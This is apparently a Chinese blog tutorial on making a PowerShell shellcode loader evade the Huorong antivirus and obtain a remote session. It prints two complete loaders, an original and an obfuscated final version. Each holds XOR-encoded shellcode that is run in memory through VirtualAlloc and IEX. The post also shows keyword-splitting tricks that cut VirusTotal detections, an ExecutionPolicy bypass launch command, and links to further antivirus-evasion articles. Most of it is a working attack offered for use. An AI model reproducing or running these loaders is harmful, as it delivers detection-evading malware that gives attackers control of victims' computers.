Powershell 過火絨免殺上線

payload生成

Powershell 過火絨免殺上線

原生payload生成後被無情秒殺

powershell免殺制作

打開powershell指令行，将payload編碼

1.建立一個變量h，用來接收之後編碼的payload

2.把FromBase64String放入變量$k中

3.利用循環每次加個’,’，并且把編碼後的資料轉換成一行

4.輸出編碼後的payload

Powershell 過火絨免殺上線

整合為ps1腳本更友善

$h= ''
$k=[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktzKCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYnZQcCPQBCEOnRtGWA9JPbgviut5qEtwnqLM1P/WSmYY5NZ+Ma6Y4+wqy6x8QlB6kAXrlVxdwM7y5/QSk93lTBKsMuOZBMABwpAHF6YvI35TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNEwouKSMlEFzT6YeXw5abnZPfOiCfborrWnU/5BV7rollSoNrdYUP83wmPVcls5fvZykXV1cuZ/e2pk+A7+8bvQhRtiN+5fSMlld5T0oY5xRuqig/6FG2/MfQyb7Le75dhB+2LT1KZD3+zcVvXE0uTZza6YyXLzIx9Qoif5Po3wt1y9hGg6LydpPI6DLJC9REcSbIduXlWs3RlXJ7nGnP+69r3Uxc++P7iSHhLe0GHLELb1v03jRzRbOUfmLnGhepaXV7XmN8sHiWlWFM4Ak6V4XBlQ8V51f9d5wp0fwBfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMXDRERFg0SFhANERcbIzEXdVs=')
$k | foreach {$h=$h+$_.ToString()+','}
$h

Powershell 過火絨免殺上線

然後将編碼得到的資料複制替換payload即可，注意去掉最後一個逗号”,“。

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,98,118,80,112,35,208,4,33,14,157,27,70,88,15,73,61,184,47,138,235,121,168,75,112,158,162,204,212,255,214,74,102,24,228,214,126,49,174,152,227,236,42,203,172,124,66,80,122,144,5,235,149,92,93,192,206,242,231,244,18,147,221,229,76,18,172,50,227,153,4,192,1,194,144,7,23,166,47,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

火絨免殺

Powershell 過火絨免殺上線

VT檢清除率(60/13)，還需要繼續改造

Powershell 過火絨免殺上線

修改關鍵字，規避靜态特征清除，時間問題隻修改了小部分

IEX $DoIt -- i`ex $DoIt
IEX $a  --  ie`x $a
$var_runme -- $vrunme
$var_buffer -- $vbuffer
func_get_proc_address --  func_k
func_get_delegate_type -- func_l
$var_type_builder -- $vk
$var_parameters -- $vp
$var_return_type-- $ve
$var_procedure -- $v_pro

建議使用工具直接替換

Powershell 過火絨免殺上線

到這裡，清除率60/5，還需要再改改

Powershell 過火絨免殺上線

最終payload

Set-StrictMode -Version 2

$DoIt = @'
function func_k {
	Param ($var_module, $v_pro)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Mic'+'rosoft.Win32.Unsa'+'feNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetPro'+'cAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetM'+'oduleH'+'andle')).Invoke($null, @($var_module)))), $v_pro))
}

function func_l {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $vp,
		[Parameter(Position = 1)] [Type] $ve = [Void]
	)

	$vk = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Refle'+'ctedDele'+'gate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMem'+'oryModule', $false).DefineType('MyDelega'+'teType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$vk.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $vp).SetImplementationFlags('Runtime, Managed')
	$vk.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $ve, $vp).SetImplementationFlags('Runtime, Managed')

	return $vk.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,115,40,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_k kernel32.dll VirtualAlloc), (func_l @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$vbuffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $vbuffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vbuffer, (func_l @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	i`ex $DoIt
}

Powershell 過火絨免殺上線

然後使用powershell遠端下載下傳并通過IEX運作腳本得到會話權限

或者手動執行

c:\windows\system32\xx>d:
d:\>cd D:\wwwroot\xx\xxFile
D:\wwwroot\xx\xxFile>powershell -ExecutionPolicy bypass -File ./x.ps1

Powershell 過火絨免殺上線

内容淺顯，沒什麼技術含量，不足之處歡迎師傅們指點和糾正，感激不盡。

Powershell 過火絨免殺上線

payload生成

powershell免殺制作

繼續閱讀

各類一句話木馬免殺集合

重新編譯開源代碼繞過防毒軟體(無導入表編譯)重新編譯開源代碼繞過防毒軟體

攻防技術——源碼免殺實戰源碼免殺實戰

木馬免殺基礎學習

C實作分離免殺前期準備

初學免殺

《黑客免殺攻防學習筆記》——PE檔案結構2

使用MSF生成的shellcode打造免殺payload

免殺之淺談shellcode加載器

cdb.exe的利用cdb.exe的利用

木馬免殺原理詳解(一)

cs免殺之基于混淆和加殼

Malware Dev 01 - 免殺之 PPID Spoofing 原了解析寫在最前背景PPID Spoofing總結參考連結

cobaltstrike的shellcode免殺基礎概念運作流程具體執行個體shellcode加載器shellcode免殺加載器

2021-09-26免殺（轉自hack）｜利用RGB隐寫隐藏Shellcodehttps://mp.weixin.qq.com/s/X5jyqaEEoSQGRWwoBq2YwA